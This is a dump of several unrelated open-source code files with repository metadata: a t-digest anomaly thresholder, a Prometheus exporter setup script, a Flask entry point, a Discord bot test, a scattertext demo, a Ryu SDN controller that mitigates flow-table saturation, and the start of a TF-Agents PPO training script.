0677076d937e4667c9c8f1be430bcebcbb3e0b1f | 2,746 | py | Python | streamad/process/tdigest_Thresholder.py | Fengrui-Liu/streamingTS | 1c5fcb9751c44a5fc69dcb237b48d93204b721e9 | [
"Apache-2.0"
] | null | null | null | streamad/process/tdigest_Thresholder.py | Fengrui-Liu/streamingTS | 1c5fcb9751c44a5fc69dcb237b48d93204b721e9 | [
"Apache-2.0"
] | null | null | null | streamad/process/tdigest_Thresholder.py | Fengrui-Liu/streamingTS | 1c5fcb9751c44a5fc69dcb237b48d93204b721e9 | [
"Apache-2.0"
] | null | null | null | from streamad.base import BaseDetector
import numpy as np
from typing import Type
from tdigest import TDigest
from collections import deque
class TDigestThresholder:
def __init__(
self,
detector: BaseDetector,
percentile_up: float = 95,
percentile_down: float = 5,
is_global: bool = True,
window_len: int = 100,
) -> None:
"""A thresholder which can filter out outliers using t-digest, and normalize the anomaly scores into [0,1] :cite:`DBLP:journals/simpa/Dunning21`.
Args:
detector (BaseDetector): A detector that must be a child class of BaseDetector.
percentile_up (float, optional): We regard the scores above `percentile_up` as anomalies. Defaults to 95.
percentile_down (float, optional): We regard the scores below `percentile_down` as anomalies. Defaults to 5.
            is_global (bool, optional): Whether to track scores globally or over a rolling window. Defaults to True.
            window_len (int, optional): The length of the rolling window; ignored when `is_global=True`. Defaults to 100.
"""
self.detector = detector
self.percentile_up = percentile_up
self.percentile_down = percentile_down
self.init_data = []
self.init_flag = False
assert (
percentile_up >= 0
and percentile_up <= 100
and percentile_down >= 0
and percentile_down <= 100
), "percentile must be between 0 and 100"
self.is_global = is_global
self.score_stats = TDigest()
self.score_deque = (
deque(maxlen=detector.window_len)
if is_global
else deque(maxlen=window_len)
)
def fit_score(self, X: np.ndarray) -> float:
if self.detector.index < self.detector.window_len:
self.init_data.append(X)
self.detector.fit_score(X)
return None
if not self.init_flag:
self.init_flag = True
for data in self.init_data:
score = self.detector.score(data)
self.score_deque.append(score)
self.score_stats.batch_update(self.score_deque)
score = self.detector.fit_score(X)
if self.is_global:
self.score_stats.update(score)
else:
self.score_stats = TDigest()
self.score_stats.batch_update(self.score_deque)
percentile_up = self.score_stats.percentile(self.percentile_up)
percentile_down = self.score_stats.percentile(self.percentile_down)
if score > percentile_up or score < percentile_down:
score = 1.0
else:
score = 0.0
return score
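# Illustrative usage sketch (not part of the original module); the detector class
# is hypothetical -- any BaseDetector subclass should work:
#   detector = SomeStreamDetector(window_len=50)
#   thresholder = TDigestThresholder(detector, percentile_up=99, percentile_down=1)
#   for x in stream:
#       label = thresholder.fit_score(x)   # None while warming up, then 0.0 or 1.0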
| 35.205128 | 153 | 0.624181 |
96f5e5a8fc63fc0b94e43763454bcc0e0c19c12e | 466 | py | Python | setup.py | konikvranik/prometheus_rpi_exporter | 2af1188d216c30827ab53ccd2b0f586f9dcae080 | [
"Apache-2.0"
] | null | null | null | setup.py | konikvranik/prometheus_rpi_exporter | 2af1188d216c30827ab53ccd2b0f586f9dcae080 | [
"Apache-2.0"
] | null | null | null | setup.py | konikvranik/prometheus_rpi_exporter | 2af1188d216c30827ab53ccd2b0f586f9dcae080 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from distutils.core import setup
setup(name='Prometheus RPi exporter',
version='1.0',
description='Prometheus exporter for RPi runtime statistics such as CPU temperature.',
author='Petr Vraník',
author_email='petr@vranik.name',
url='https://github.com/konikvranik/prometheus_rpi_exporter',
scripts=['prometheus-rpi-exporter.py'],
data_files=[('/etc/systemd/system', ['rpi_exporter.service'])]
)
| 33.285714 | 92 | 0.690987 |
f8a8fa9699cbf9ac14dd0e9e709b4b1ba83ee1af | 369 | py | Python | fit_app.py | mihalw28/fitness_app | ebec29ac2277e3abc8e18834825a191b8f0c6c2e | [
"MIT"
] | null | null | null | fit_app.py | mihalw28/fitness_app | ebec29ac2277e3abc8e18834825a191b8f0c6c2e | [
"MIT"
] | 9 | 2019-05-07T08:21:58.000Z | 2022-03-08T21:09:38.000Z | fit_app.py | mihalw28/fitness_app | ebec29ac2277e3abc8e18834825a191b8f0c6c2e | [
"MIT"
] | null | null | null | from datetime import datetime
from app import create_app, db
from app.models import Train, User
app = create_app()
application = app
if __name__ == "__main__":
application.run()
@app.shell_context_processor
def make_shell_context():
return {"db": db, "User": User, "Train": Train}
@app.context_processor
def add_now():
return {"now": datetime.now()}
| 17.571429 | 51 | 0.712737 |
2ba0b37c50d152c58d68750374899f07cd5f8ca5 | 1,191 | py | Python | tests/cogs/test_verify_cog.py | lexicalunit/spellbot | 17a4999d5e1def06246727ac5481230aa4a4557d | [
"MIT"
] | 13 | 2020-07-03T01:20:54.000Z | 2021-11-22T06:06:21.000Z | tests/cogs/test_verify_cog.py | lexicalunit/spellbot | 17a4999d5e1def06246727ac5481230aa4a4557d | [
"MIT"
] | 660 | 2020-06-26T02:52:18.000Z | 2022-03-31T14:14:02.000Z | tests/cogs/test_verify_cog.py | lexicalunit/spellbot | 17a4999d5e1def06246727ac5481230aa4a4557d | [
"MIT"
] | 3 | 2020-07-12T06:18:39.000Z | 2021-06-22T06:54:47.000Z | from unittest.mock import AsyncMock, MagicMock
import discord
import pytest
from spellbot.cogs.verify_cog import VerifyCog
from spellbot.database import DatabaseSession
from spellbot.models import Verify
from tests.mixins import InteractionContextMixin
@pytest.mark.asyncio
class TestCogVerify(InteractionContextMixin):
async def test_verify_and_unverify(self):
target = MagicMock(spec=discord.Member)
target.id = 1002
target.display_name = "user"
cog = VerifyCog(self.bot)
await cog.verify.func(cog, self.ctx, target)
self.ctx.send.assert_called_once_with(f"Verified <@{target.id}>.", hidden=True)
found = DatabaseSession.query(Verify).filter(Verify.user_xid == target.id).one()
assert found.guild_xid == self.ctx.guild_id
assert found.user_xid == target.id
assert found.verified
self.ctx.send = AsyncMock() # reset mock
await cog.unverify.func(cog, self.ctx, target)
self.ctx.send.assert_called_once_with(f"Unverified <@{target.id}>.", hidden=True)
found = DatabaseSession.query(Verify).filter(Verify.user_xid == target.id).one()
assert not found.verified
| 35.029412 | 89 | 0.713686 |
b87b6c7a8966b4f67c7886026f80db2e5b4046e8 | 17,146 | py | Python | sift_PPCount.py | tuliopascoal/sift-defense | f97e1e4780ef124251e7903c97c4adb899780a4b | [
"Apache-2.0"
] | 2 | 2021-11-08T09:33:43.000Z | 2021-11-08T12:44:38.000Z | sift_PPCount.py | tuliopascoal/sift-defense | f97e1e4780ef124251e7903c97c4adb899780a4b | [
"Apache-2.0"
] | null | null | null | sift_PPCount.py | tuliopascoal/sift-defense | f97e1e4780ef124251e7903c97c4adb899780a4b | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# v 1.0
# Copyright (C) 2016 LAR
# Author: Tulio Pascoal
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import HANDSHAKE_DISPATCHER, CONFIG_DISPATCHER, MAIN_DISPATCHER, DEAD_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.ofproto import ether
from ryu.ofproto import inet
from ryu import utils
from ryu.lib.packet import packet, ethernet, arp, ipv4, tcp, udp, icmp
import collections
from datetime import datetime, timedelta
from random import random, uniform
import threading
import thread
import time
from ryu.lib import hub
import atexit
import logging
import ryu.app.ofctl.api
_countfull = 0
_countbuffer = 0
_countflowmod = 0
_countin = 0
_countinR = 0
def incrcounterF(n):
global _countfull
_countfull = _countfull + n
def incrcounterB(n):
global _countbuffer
_countbuffer = _countbuffer + n
def incrcounterFlowMod(n):
global _countflowmod
_countflowmod = _countflowmod + n
def incrcounterIn(n):
global _countin
_countin = _countin + n
def incrcounterInR(n):
global _countinR
_countinR = _countinR + n
def savecounter():
open("counters", "w").write("Table Full Messages: %d\nBuffer Unknow Messages: %d\nFlow Mod Messages: %d\nPacket-In Messages: %d\nPacket-InR Messages: %d " % (_countfull, _countbuffer, _countflowmod, _countin, _countinR))
#open("counters", "w").write("\nBuffer Unknow Messages: %d" % _countbuffer)
#open("counters", "w").write("\nPacket In Messages: %d" % _countflowmod)
#open("counterB", "w").write("%d" % _countbuffer)
#open("counterB", "w").write("%d" % _countbuffer)
atexit.register(savecounter)
Flow = collections.namedtuple('Flow', 'src, dst, tcp_src, tcp_dst, time_in, match')
IDLE_TIME = 10
HARD_TIME = 0
#TIME = IDLE_TIME + 0.5
PMOD = 1500
buffer = 1500
pmod = 1500
round = 0.1
flow_list = list()
lock = threading.Lock()
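# Illustrative note (not part of the original file): each admitted TCP flow is
# tracked as a Flow record, and a later flow whose addresses and ports are the
# mirror image of an existing entry is treated as its pair and removed, e.g.:
#   f = Flow(src='10.0.0.1', dst='10.0.0.2', tcp_src=5555, tcp_dst=80,
#            time_in=datetime.now(), match=None)
# A packet with src 10.0.0.2, dst 10.0.0.1, tcp_src 80, tcp_dst 5555 matches f
# in check_pair()/check_pair2() and triggers removal of the installed flow rule.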
class SimpleSwitch13(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(SimpleSwitch13, self).__init__(*args, **kwargs)
self.mac_to_port = {}
try:
thread.start_new_thread(self.reset_round, ( round,))
except:
print "Unable to start Thread for reset_round"
@set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self,ev):
datapath = ev.msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
match = parser.OFPMatch()
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)]
self.add_Cflow(datapath, 0, match, actions)
def reset_round(self, round):
global pmod
while True:
pmod = PMOD
#print 'NEW PMOD:', pmod
time.sleep(round)
def clean_by_timeout(self, time):
global flow_list
while True:
i=0
while i < len(flow_list):
time_now = datetime.now()
diff = time_now - flow_list[i].time_in
                if ( diff.seconds >= IDLE_TIME or diff.seconds >= HARD_TIME ):
                    print "timeout expired for:", flow_list[i]
del flow_list[i]
time.sleep(time)
def check_flow(self, new_flow):
global flow_list
global lock
lock.acquire()
try:
i=0
while (i < len(flow_list)):
if ( (new_flow.src == flow_list[i].src) and (new_flow.dst == flow_list[i].dst) and (new_flow.tcp_src == flow_list[i].tcp_src) and (new_flow.tcp_dst == flow_list[i].tcp_dst) ):
#print "flow already created:", flow_list[i]
return True
else:
i = i +1
return False
finally:
lock.release()
def check_pair(self, flow, datapath):
global flow_list
global lock
lock.acquire()
try:
i=0
while (i < len(flow_list)):
if ( (flow.src == flow_list[i].dst) and (flow.dst == flow_list[i].src) and (flow.tcp_src == flow_list[i].tcp_dst) and (flow.tcp_dst == flow_list[i].tcp_src) ):
print "pair flow found:", flow_list[i]
flow_removed = flow_list.pop(i)
match_del = flow_removed.match
self.remove_flow(datapath, match_del)
#print "List initial size:", len(flow_list)
print "PAIR FLOW REMOVED!!!!!:", match_del
#print "List final size:", len(flow_list)
return True
else:
i = i +1
return False
finally:
lock.release()
def check_pair2(self, ip_src, ip_dst, tcp_src, tcp_dst, datapath):
global flow_list
global lock
#print ip_src, ip_dst, tcp_src, tcp_dst
lock.acquire()
try:
i=0
while (i < len(flow_list)):
if ( (ip_src == flow_list[i].dst) and (ip_dst == flow_list[i].src) and (tcp_src == flow_list[i].tcp_dst) and (tcp_dst == flow_list[i].tcp_src) ):
print "pair flow found:", flow_list[i]
flow_removed = flow_list.pop(i)
match_del = flow_removed.match
self.remove_flow(datapath, match_del)
#print "List initial size:", len(flow_list)
print "PAIR FLOW REMOVED!!!!!:", match_del
#print "List final size:", len(flow_list)
return True
else:
i = i +1
return False
finally:
lock.release()
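    # Illustrative note: a "pair" is the reverse direction of the same TCP
    # connection. For example (addresses made up), the flow
    # (src=10.0.0.1, dst=10.0.0.2, tcp_src=1234, tcp_dst=80) is paired with
    # (src=10.0.0.2, dst=10.0.0.1, tcp_src=80, tcp_dst=1234); once the reverse
    # entry is found, its rule is removed from the switch and from flow_list.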
def remove_flow_list(self, src, dst):
global flow_list
global lock
lock.acquire()
try:
#print "List initial size into remove_flow_list:", len(flow_list)
i=0
while (i < len(flow_list)):
if ( (src == flow_list[i].src) and (dst == flow_list[i].dst)):
#print flow_list[i]
del flow_list[i]
#print "List final size into remove_flow_list:", len(flow_list)
else:
i = i + 1
finally:
lock.release()
def add_Cflow(self, datapath, priority, match, actions, buffer_id=None):
global flow_list
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
instructions=inst)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst)
datapath.send_msg(mod)
self.logger.info("controller flow created")
def add_flow(self, datapath, priority, match, actions, pkt_ip=None,pkt_ethernet=None, pkt_tcp=None, idle_timeout=None, hard_timeout=None, buffer_id=None):
if pkt_tcp is None:
            print 'Not a TCP packet (add_flow)!!!'
return
global flow_list
global pmod
global lock
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
source_ip = pkt_ip.src
destination_ip = pkt_ip.dst
tcp_src = pkt_tcp.src_port
tcp_dst = pkt_tcp.dst_port
new_flow = Flow(src=source_ip, dst=destination_ip, tcp_src=tcp_src, tcp_dst=tcp_dst, time_in=datetime.now(), match=match)
'''found = self.check_flow(new_flow)
if (found == True):
print "List final size:", len(flow_list)
return'''
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
idle_timeout=idle_timeout, hard_timeout=hard_timeout,
instructions=inst, flags=ofproto.OFPFF_SEND_FLOW_REM)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
idle_timeout=idle_timeout, hard_timeout=hard_timeout,
match=match, instructions=inst, flags=ofproto.OFPFF_SEND_FLOW_REM)
datapath.send_msg(mod)
incrcounterFlowMod(1)
'''lock.acquire()
try:
flow_list.append(new_flow)
self.logger.info("flow created and added to the list (add_flow)")
print "List final size:", len(flow_list)
finally:
lock.release()'''
found = self.check_flow(new_flow)
lock.acquire()
try:
if (found == False):
flow_list.append(new_flow)
#self.logger.info("flow created and added to the list")
#print "Match: ", new_flow.match
#print "List final size:", len(flow_list)
finally:
lock.release()
def caracterizar_flow(self, datapath, in_port, out_port, actions, pkt_ip, pkt_ethernet, pkt_tcp=None, buffer_id=None):
if pkt_tcp is None:
return
parser = datapath.ofproto_parser
ipv4_src = pkt_ip.src
ipv4_dst = pkt_ip.dst
eth_dst = pkt_ethernet.dst
eth_src = pkt_ethernet.src
tcp_src = pkt_tcp.src_port
tcp_dst = pkt_tcp.dst_port
match = parser.OFPMatch(in_port=in_port,
eth_type=ether.ETH_TYPE_IP,
ip_proto=inet.IPPROTO_TCP,
eth_dst=eth_dst,
ipv4_src=ipv4_src,
ipv4_dst=ipv4_dst,
tcp_src=tcp_src,
tcp_dst=tcp_dst)
'''actions = [parser.OFPActionSetField(ipv4_src=ipv4_src), #[parser.OFPActionSetField(eth_dst=eth_dst),
parser.OFPActionSetField(ipv4_dst=ipv4_dst),
parser.OFPActionSetField(tcp_src=tcp_src),
parser.OFPActionSetField(tcp_dst=tcp_dst),
parser.OFPActionOutput(out_port)]'''
if buffer_id:
self.add_flow(datapath, 1, match, actions, pkt_ip, pkt_ethernet, pkt_tcp, IDLE_TIME, HARD_TIME, buffer_id)
else:
self.add_flow(datapath, 1, match, actions, pkt_ip, pkt_ethernet, pkt_tcp, IDLE_TIME, HARD_TIME)
#self.add_flow(datapath, 1, match, actions, pkt_ip, pkt_ethernet, pkt_tcp, IDLE_TIME, HARD_TIME)
return actions
def remove_flow(self, datapath, match_del):
#self.logger.info("into remove_flow")
instructions = []
ofproto = datapath.ofproto
flow_mod = datapath.ofproto_parser.OFPFlowMod(datapath, 0, 0,
0,
ofproto.OFPFC_DELETE,
0,
0,
1,
ofproto.OFPCML_NO_BUFFER,
ofproto.OFPP_ANY,
ofproto.OFPG_ANY, 0,
match_del, instructions)
#self.logger.info("before remove flow_mod")
datapath.send_msg(flow_mod)
#self.logger.info("flow removed from the controller")
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
if ev.msg.msg_len < ev.msg.total_len:
self.logger.info("packet truncated: only %s of %s bytes", ev.msg.msg_len, ev.msg.total_len)
incrcounterIn(1)
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
in_port = msg.match['in_port']
pkt = packet.Packet(msg.data)
eth = pkt.get_protocols(ethernet.ethernet)[0]
dst = eth.dst
src = eth.src
pkt_ip = pkt.get_protocol(ipv4.ipv4)
pkt_tcp = pkt.get_protocol(tcp.tcp)
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in %s %s %s %s", dpid, src, dst, in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
actions = [parser.OFPActionOutput(out_port)]
if out_port != ofproto.OFPP_FLOOD:
match = parser.OFPMatch(in_port=in_port,eth_dst=dst)
if pkt_tcp is not None:
#self.logger.info("Teste 2 - tcp packet")
if msg.buffer_id != ofproto.OFP_NO_BUFFER:
incrcounterInR(1)
self.logger.info("Existe buffer_id %s", msg.buffer_id)
self.caracterizar_flow(datapath, in_port, out_port, actions, pkt_ip,
eth, pkt_tcp=pkt_tcp, buffer_id = msg.buffer_id)
return
else:
incrcounterInR(1)
self.logger.info("Nao existe buffer_id")
self.caracterizar_flow(datapath, in_port, out_port, actions, pkt_ip,
eth, pkt_tcp=pkt_tcp)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
print "buffer_id == OFP_NO_BUFFER"
data = msg.data
out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
in_port=in_port, actions=actions, data=data)
if out is None:
self.logger.info("out is None")
else:
self.logger.info("out is not None")
datapath.send_msg(out)
#self.logger.info("after send_msg in packet in")
@set_ev_cls(ofp_event.EventOFPFlowRemoved, MAIN_DISPATCHER)
def flow_removed_handler(self, ev):
global flow_list
msg = ev.msg
dp = msg.datapath
ofp = dp.ofproto
ip_src = msg.match['ipv4_src']
ip_dst = msg.match['ipv4_dst']
if msg.reason == ofp.OFPRR_IDLE_TIMEOUT:
reason = 'IDLE TIMEOUT'
elif msg.reason == ofp.OFPRR_HARD_TIMEOUT:
reason = 'HARD TIMEOUT'
elif msg.reason == ofp.OFPRR_DELETE:
reason = 'DELETE'
elif msg.reason == ofp.OFPRR_GROUP_DELETE:
reason = 'GROUP DELETE'
else:
reason = 'unknown'
print "Deletado: ", reason
print "Match: ", msg.match
if ( (reason == 'IDLE TIMEOUT') or (reason == 'HARD TIMEOUT') ):
self.remove_flow_list(ip_src, ip_dst)
            # print 'Deleted from the list!'
def send_table_stats_request(self, datapath):
ofp_parser = datapath.ofproto_parser
req = ofp_parser.OFPTableStatsRequest(datapath, 0)
datapath.send_msg(req)
@set_ev_cls(ofp_event.EventOFPTableStatsReply, MAIN_DISPATCHER)
def table_stats_reply_handler(self, ev):
#tables = []
table_id = ev.msg.body[0].table_id
active_count = ev.msg.body[0].active_count
self.logger.info("table_id: %d", table_id)
self.logger.info("active_count: %d", active_count)
    # Receives the error event
@set_ev_cls(ofp_event.EventOFPErrorMsg, [HANDSHAKE_DISPATCHER, CONFIG_DISPATCHER, MAIN_DISPATCHER])
def error_msg_handler(self, ev):
global flow_list
global pmod
global lock
msg = ev.msg
self.logger.info('OFPErrorMsg received: type=0x%02x code=0x%02x '
'message=%s',
msg.type, msg.code, utils.hex_array(msg.data))
if (msg.type == 1):
if (msg.code == 8):
print "BUFFER UNKNOW - SATURATION ATTACK"
incrcounterB(1)
if (msg.type == 5):
if (msg.code == 1):
print "TABLE IS FULL!!!!!!!!!!!!!!"
incrcounterF(1)
self.flows_request_stats(msg.datapath)
#self.send_table_stats_request(msg.datapath)
def flows_request_stats(self, datapath):
self.logger.debug('send stats request: %016x', datapath.id)
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
req = parser.OFPFlowStatsRequest(datapath)
datapath.send_msg(req)
req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)
datapath.send_msg(req)
@set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)
def _flow_stats_reply_handler(self, ev):
body = ev.msg.body
sorted_list = sorted([flow for flow in body if flow.priority == 1],
key=lambda flow: (flow.packet_count))
''' print sorted_list[0]
print sorted_list[0].match['ipv4_src']
print sorted_list[0].match['ipv4_dst']
print sorted_list[0].match['tcp_src']
print sorted_list[0].match['tcp_dst']'''
self.check_pair2(sorted_list[0].match['ipv4_src'], sorted_list[0].match['ipv4_dst'],
sorted_list[0].match['tcp_src'], sorted_list[0].match['tcp_dst'],
ev.msg.datapath)
self.remove_flow(ev.msg.datapath, sorted_list[0].match)
'''for stat in sorted([flow for flow in body if flow.priority == 1],
key=lambda flow: (flow.byte_count)):
#self.logger.info('%8d %8d', stat.packet_count/stat.duration_sec, stat.byte_count/stat.duration_sec)
#print stat
#print flow
self.logger.info('%8d %8d %8d %8d', stat.packet_count, stat.byte_count, stat.length, stat.duration_sec)
#self.remove_flow(ev.msg.datapath, flow.match)'''
'''
def send_port_stats_request(self, datapath):
ofp = datapath.ofproto
ofp_parser = datapath.ofproto_parser
req = ofp_parser.OFPPortStatsRequest(datapath, 0, ofp.OFPP_ANY)
datapath.send_msg(req)
@set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)
def port_stats_reply_handler(self, ev):
ports = []
for stat in ev.msg.body:
ports.append('port_no=%d '
'rx_packets=%d tx_packets=%d '
'rx_bytes=%d tx_bytes=%d '
'rx_dropped=%d tx_dropped=%d '
'rx_errors=%d tx_errors=%d '
'rx_frame_err=%d rx_over_err=%d rx_crc_err=%d '
'collisions=%d duration_sec=%d duration_nsec=%d' %
(stat.port_no,
stat.rx_packets, stat.tx_packets,
stat.rx_bytes, stat.tx_bytes,
stat.rx_dropped, stat.tx_dropped,
stat.rx_errors, stat.tx_errors,
stat.rx_frame_err, stat.rx_over_err,
stat.rx_crc_err, stat.collisions,
stat.duration_sec, stat.duration_nsec))
self.logger.info('PortStats: %s', ports)
''' | 30.838129 | 221 | 0.679109 |
95d5dcabb81b8e0db6319835f05176cb715b99f0 | 1,069 | py | Python | demo_dispersion_basic.py | jairoruizsaenz/scattertext | 5d96f62434057cc26ed90a1d0b314984e4ef90f8 | [
"Apache-2.0"
] | 1,823 | 2016-07-28T00:25:56.000Z | 2022-03-30T12:33:57.000Z | demo_dispersion_basic.py | jairoruizsaenz/scattertext | 5d96f62434057cc26ed90a1d0b314984e4ef90f8 | [
"Apache-2.0"
] | 92 | 2016-07-28T23:13:20.000Z | 2022-01-24T03:53:38.000Z | demo_dispersion_basic.py | jairoruizsaenz/scattertext | 5d96f62434057cc26ed90a1d0b314984e4ef90f8 | [
"Apache-2.0"
] | 271 | 2016-12-26T12:56:08.000Z | 2022-03-24T19:35:13.000Z | import statsmodels.api as sm
from sklearn.neighbors import KNeighborsRegressor
import scattertext as st
df = st.SampleCorpora.ConventionData2012.get_data().assign(
parse=lambda df: df.text.apply(st.whitespace_nlp_with_sentences)
)
corpus = st.CorpusWithoutCategoriesFromParsedDocuments(
df, parsed_col='parse'
).build().get_unigram_corpus().remove_infrequent_words(
minimum_term_count=6
)
dispersion = st.Dispersion(corpus)
dispersion_df = dispersion.get_df().assign(
X=lambda df: df.Frequency,
Xpos=lambda df: st.Scalers.log_scale(df.X),
Y=lambda df: dispersion.rosengrens(),
Ypos=lambda df: st.Scalers.scale(df.Y),
)
html = st.dataframe_scattertext(
corpus,
plot_df=dispersion_df,
metadata=corpus.get_df()['speaker'] + ' (' + corpus.get_df()['party'].str.upper() + ')',
ignore_categories=True,
x_label='Log Frequency',
y_label="Rosengren's S",
y_axis_labels=['More Dispersion', 'Medium', 'Less Dispersion'],
)
fn = 'demo_dispersion_basic.html'
open(fn, 'w').write(html)
print('open ./%s in Chrome' % fn)
| 28.131579 | 92 | 0.723106 |
ce2b2b3dc42eebfaa731ba6890341bd8e6fe6bcd | 15,253 | py | Python | tf_agents/experimental/examples/ppo/schulman17/train_eval_lib.py | ngroves08/agents | cdb7a94124a1bc756217ad868b1aa49c11dc26bf | [
"Apache-2.0"
] | 1 | 2021-04-19T02:28:24.000Z | 2021-04-19T02:28:24.000Z | tf_agents/experimental/examples/ppo/schulman17/train_eval_lib.py | ngroves08/agents | cdb7a94124a1bc756217ad868b1aa49c11dc26bf | [
"Apache-2.0"
] | null | null | null | tf_agents/experimental/examples/ppo/schulman17/train_eval_lib.py | ngroves08/agents | cdb7a94124a1bc756217ad868b1aa49c11dc26bf | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
r"""Train/eval PPOClipAgent in Mujoco environments with (Schulman, 17) methods.
To reproduce (Schulman, 17), here we collect fixed length sequences of
`collect_sequence_length` to store in the replay buffer and perform advantage
calculation on. Each sequence can span multiple episodes, separated by a
boundary step. Bootstrapping occurs during advantage calculation for the partial
episodes that are part of the sequences.
Note that this isn't necessary. Alternatively, you could instead collect a
specified number of episodes in each training iteration. Each `item` stored in
Reverb tables is a full episode, and advantage calculation happens on full
episodes. As a result, no bootstrapping is required.
All hyperparameters come from the PPO paper
https://arxiv.org/abs/1707.06347.pdf
"""
import os
from absl import logging
import gin
import reverb
import tensorflow.compat.v2 as tf
from tf_agents.agents.ppo import ppo_actor_network
from tf_agents.agents.ppo import ppo_clip_agent
from tf_agents.environments import suite_mujoco
from tf_agents.metrics import py_metrics
from tf_agents.networks import value_network
from tf_agents.policies import py_tf_eager_policy
from tf_agents.replay_buffers import reverb_replay_buffer
from tf_agents.replay_buffers import reverb_utils
from tf_agents.train import actor
from tf_agents.train import learner
from tf_agents.train import ppo_learner
from tf_agents.train import triggers
from tf_agents.train.utils import spec_utils
from tf_agents.train.utils import train_utils
class ReverbFixedLengthSequenceObserver(
reverb_utils.ReverbAddTrajectoryObserver):
"""Reverb fixed length sequence observer.
This is a specialized observer similar to ReverbAddTrajectoryObserver but each
sequence contains a fixed number of steps and can span multiple episodes. This
implementation is consistent with (Schulman, 17).
**Note**: Counting of steps in drivers does not include boundary steps. To
guarantee only 1 item is pushed to the replay when collecting n steps with a
`sequence_length` of n make sure to set the `stride_length`.
"""
def __call__(self, trajectory):
"""Writes the trajectory into the underlying replay buffer.
Allows trajectory to be a flattened trajectory. No batch dimension allowed.
Args:
trajectory: The trajectory to be written which could be (possibly nested)
trajectory object or a flattened version of a trajectory. It assumes
there is *no* batch dimension.
"""
self._writer.append(trajectory)
self._cached_steps += 1
self._write_cached_steps()
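# A minimal construction sketch for the observer above (argument values are
# illustrative and `client` is assumed to be a reverb.Client connected to the
# server): passing stride_length equal to sequence_length makes the writer push
# exactly one item per collected fixed-length sequence, per the note above.
#
# observer = ReverbFixedLengthSequenceObserver(
#     client, ['training_table'], sequence_length=2048, stride_length=2048)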
@gin.configurable
def train_eval(
root_dir,
env_name='HalfCheetah-v2',
# Training params
num_iterations=1600,
actor_fc_layers=(64, 64),
value_fc_layers=(64, 64),
learning_rate=3e-4,
collect_sequence_length=2048,
minibatch_size=64,
num_epochs=10,
# Agent params
importance_ratio_clipping=0.2,
lambda_value=0.95,
discount_factor=0.99,
entropy_regularization=0.,
value_pred_loss_coef=0.5,
use_gae=True,
use_td_lambda_return=True,
gradient_clipping=0.5,
value_clipping=None,
# Replay params
reverb_port=None,
replay_capacity=10000,
# Others
policy_save_interval=5000,
summary_interval=1000,
eval_interval=10000,
eval_episodes=100,
debug_summaries=False,
summarize_grads_and_vars=False):
"""Trains and evaluates PPO (Importance Ratio Clipping).
Args:
root_dir: Main directory path where checkpoints, saved_models, and summaries
will be written to.
env_name: Name for the Mujoco environment to load.
num_iterations: The number of iterations to perform collection and training.
actor_fc_layers: List of fully_connected parameters for the actor network,
where each item is the number of units in the layer.
    value_fc_layers: List of fully_connected parameters for the value network,
where each item is the number of units in the layer.
learning_rate: Learning rate used on the Adam optimizer.
collect_sequence_length: Number of steps to take in each collect run.
minibatch_size: Number of elements in each mini batch. If `None`, the entire
collected sequence will be treated as one batch.
num_epochs: Number of iterations to repeat over all collected data per data
collection step. (Schulman,2017) sets this to 10 for Mujoco, 15 for
Roboschool and 3 for Atari.
importance_ratio_clipping: Epsilon in clipped, surrogate PPO objective. For
more detail, see explanation at the top of the doc.
lambda_value: Lambda parameter for TD-lambda computation.
discount_factor: Discount factor for return computation. Default to `0.99`
which is the value used for all environments from (Schulman, 2017).
entropy_regularization: Coefficient for entropy regularization loss term.
